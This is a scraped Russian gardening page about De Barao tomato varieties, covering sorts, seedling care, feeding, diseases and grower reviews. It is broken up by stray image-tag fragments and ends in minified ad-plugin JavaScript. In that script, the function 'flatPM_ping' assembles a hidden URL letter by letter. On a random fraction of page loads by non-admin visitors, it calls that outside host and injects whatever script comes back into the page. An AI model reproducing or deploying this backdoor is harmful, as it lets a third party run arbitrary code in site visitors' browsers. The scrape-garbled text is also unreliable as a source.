  • подходят для цельноплодного консервирования и употребления в свежем виде
fermilon.ru » src=»https://qlumba.com/wp-content/uploads/2019/08/fmg5d5507313406f3.jpg» alt=»table_pic_» w /> Де барао красный

Описание:

  • среднепоздний сорт с периодом созревания 120-130 дней;
  • высота куста может достигать в теплице 3 м;
  • плоды ярко-красного цвета, овально-цилиндрической формы, массой 80-100 г;
  • мякоть очень плотная, что позволяет их долго хранить в свежем виде;
  • подходят для цельноплодного консервирования и употребления в свежем виде
img4.st.kashalot.com » src=»https://qlumba.com/wp-content/uploads/2019/08/fmg5d550731eadb48.jpg» alt=»table_pic_» w /> Черный

Описание:

  • среднеспелый томат с периодом созревания 115-130 дней;
  • кусты высокие с мощной корневой системой, что позволяет переносить растениям понижение температур без потерь урожайности;
  • плоды небольшие, сливовидные, красные с темным отливом, массой 40-80 г;
  • на одной кисти может образовываться большое количество спелых томатов;
  • урожайность с 1 кв.м достигает 15 кг
fermer.blog » src=»https://qlumba.com/wp-content/uploads/2019/08/fmg5d550732d89703.jpg» alt=»table_pic_» w /> Гигант

Описание:

  • срок созревание гигантских кустов составляет 125-135 дней, что позволяет их выращивать исключительно в теплице;
  • кусты превышают в высоту 3 м;
  • плоды округлые с вытянутым носиком, массой 350 г. У плодоножки образуется характерное зеленое пятно;
  • урожайность высокая привлекает фермеров для выращивания в коммерческих целях. С одного куста можно собрать до 25 кг плодов
sadik45.ru » src=»https://qlumba.com/wp-content/uploads/2019/08/fmg5d55073389fc44.jpg» alt=»table_pic_» w /> Помидоры де барао царский

Описание:

  • индетерминантный сорт с мощными кустами высотой до 2 м;
  • срок созревания 110-120 дней;
  • плоды красные, среднего размера, массой до 170 г;
  • урожайность с куста превышает 15 кг;
  • вкусовые качества отменные с ярко выраженным сладким томатным вкусом
Де барао золотой

Описание:

  • ярко-желтые плоды созревают немного раньше красноплодных томатов через 110-120 дней;
  • высота куста 2 м, урожайность 12 кг с куста;
  • плоды вытянутой формы массой 80-90 г;
  • подходят для свежего употребления и консервирования

Высаживать рассадой в открытый грунт

autogear.ru » src=»https://qlumba.com/wp-content/uploads/2019/08/fmg5d550734b09518.jpg» alt=»table_pic_» w /> Шаг 1. Выращивание рассады

  • в общую емкость с плодородным и рыхлым грунтом проводят посев подготовленных семян;
  • семена на рассаду перед посадкой выдержать в растворе марганцовки 30 мин;
  • первые всходы появляются через 5-7 дней. После появления 2-3 листочков можно приступать к пикировке рассады
eda-land.ru » src=»https://qlumba.com/wp-content/uploads/2019/08/fmg5d550735791488.jpg» alt=»table_pic_» w /> Шаг 2. Посадка

  • по достижении возраста рассады 60 дней она полностью готова к высадке на постоянное место;
  • учитывая быстрый рост кустов при посадке, следует предусмотреть высокие шпалеры для подвязки;
  • на 1 кв.м следует высаживать не более 3 кустов
eda-land.ru » src=»https://qlumba.com/wp-content/uploads/2019/08/fmg5d5507363307f5.jpg» alt=»table_pic_» w /> Шаг 3. Полив

  • полив должен быть умеренный, первые 2 недели после пересадки 1 раз в 3-5 дней;
  • при появлении цветочных кистей поливать по мере необходимости, следя за тем, чтобы не поникали листья;
  • для сохранения влаги в почве использовать мульчу
nasotke.ru » src=»https://qlumba.com/wp-content/uploads/2019/08/fmg5d550737306cf5.jpg» alt=»table_pic_» w /> Шаг 4. Подкормка

  • 1 раз в две недели использовать суперфосфат при поливе посадок (20 г на ведро воды);
  • 1 раз в месяц поливать настоем птичьего помета (0,5 л на ведро);
  • хороший эффект дает полив настоем крапивы 1 раз в месяц
dachavremya.ru » src=»https://qlumba.com/wp-content/uploads/2019/08/fmg5d550737d18980.jpg» alt=»table_pic_» w /> Шаг 5. Формирование кустов

  • каждые 7-10 дней на стеблях убирать боковые пасынки. Формировать куст в 1-2 стебля;
  • по достижении 2 м роста, у стеблей прищипнуть макушки;
  • по мере образования цветочных кистей удалять нижние листья

Болезни и вредители

plantdoctor.pbworks.com » src=»https://qlumba.com/wp-content/uploads/2019/08/fmg5d550738e04e20.jpg» alt=»table_pic_» w /> Черная пятнистость

Способы борьбы:

  • обработать посадки фунгицидом Фитолавин;
  • убрать пораженные части растения;
  • провести опудривание древесной золой или толченым активированным углем
ferma-biz.ru » src=»https://qlumba.com/wp-content/uploads/2019/08/fmg5d55073a51fd13.jpg» alt=»table_pic_» w /> Вершинная гниль

Способы борьбы:

  • при внесении удобрений использовать подкормки из птичьего помета;
  • по листу 2-3 раза за сезон обработать кусты раствором кальциевой селитры;
  • следить за влажностью почвы и не допускать застоя воды в корнях;
  • для предотвращения переувлажнения земли использовать мульчу
agronomu.com » src=»https://qlumba.com/wp-content/uploads/2019/08/fmg5d55073b01bc82.jpg» alt=»table_pic_» w /> Слизни

Способы борьбы:

  • часто проветривать теплицы и пленочные укрытия;
  • рыхлить почву вокруг кустов;
  • посыпать посадки и землю вокруг древесной золой смешанной с красным жгучим перцем

Отзывы огородников

Светик, Ступино

Мощный индет, росло 2 куста в теплице. Плоды получились с носиком, очень красивые, вкусные , вес около 50-70 грамм.

Креатив

Плоды средние. От размера крупного куриного яйца. Гигантами не вырастают . На вкус сладкие. Кислоты нет. Очень хороши для приготовления салата.

Что надо запомнить

  1. Высаживать на 1 кв.м не более 3 кустов. Учитывая высоту кустов и мощные стебли томатам Де барао требуется большая площадь для роста.
  2. Поливать умеренно. С осторожностью поливать в период образования плодов, так как томаты склонны к растрескиванию.

Проводить профилактические обработки посадок. В период выращивания томатов проводить профилактические обработки посадок древесной золой, красным перцем, чесночной настойкой

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};